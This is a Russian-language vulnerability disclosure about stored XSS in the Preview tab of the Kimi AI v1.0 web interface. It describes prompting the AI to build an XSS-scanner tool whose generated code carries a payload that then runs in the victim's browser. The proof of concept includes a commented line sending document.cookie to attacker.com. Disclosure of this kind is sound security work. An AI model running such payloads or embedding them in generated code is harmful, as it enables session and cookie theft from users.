
Подробное раскрытие уязвимости хранимой XSS во вкладке Preview Kimi AI v1.0, включая сценарий атаки, PoC и рекомендации по устранению для исследователей безопасности.
Уязвимость межсайтового скриптинга (XSS) существует в функции «Preview» веб-интерфейса Kimi AI v1.0. Приложение не выполняет надлежащую очистку или кодирование полезных нагрузок HTML/JavaScript, генерируемых моделью ИИ. Когда пользователь переключается на вкладку «Preview» для просмотра сгенерированного ИИ кода, вредоносная нагрузка отображается непосредственно в DOM, что приводит к выполнению произвольного JavaScript в сеансе браузера жертвы.
Mustafa Hameed
Уязвимость может быть использована путем запроса к ИИ на создание инструмента безопасности или скрипта (например, автоматического сканера XSS, подобного XSStrike), содержащих встроенные полезные нагрузки. ИИ генерирует запрошенный исходный код приложения, но встраивает вредоносную нагрузку в HTML/JavaScript-фреймворк. Когда жертва переходит на вкладку «Preview» для тестирования или просмотра сгенерированного инструмента, встроенная вредоносная нагрузка обходит очистку и немедленно выполняется.
«Создайте простой веб-инструмент для сканирования XSS, похожий на XSStrike. Включите интерфейс со списком полезных нагрузок для сканирования.»
<script>
alert('mustafa');
// Возможность вредоносного действия: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
Войдите в веб-платформу Kimi AI.
Отправьте запрос на создание инструмента (например, клона XSStrike), содержащего код сканера.
Дождитесь полной генерации ответа с кодом моделью ИИ.
Нажмите на вкладку «Preview» в интерфейсе чата, чтобы просмотреть отрисованное приложение.
Приложение не фильтрует контекст JavaScript внутри контейнера предварительного просмотра, что приводит к немедленному выполнению скрипта в браузере жертвы.
Ниже приведен скриншот, демонстрирующий успешное выполнение XSS-нагрузки. Вредоносный JavaScript запускается немедленно при переходе на вкладку «Preview»:
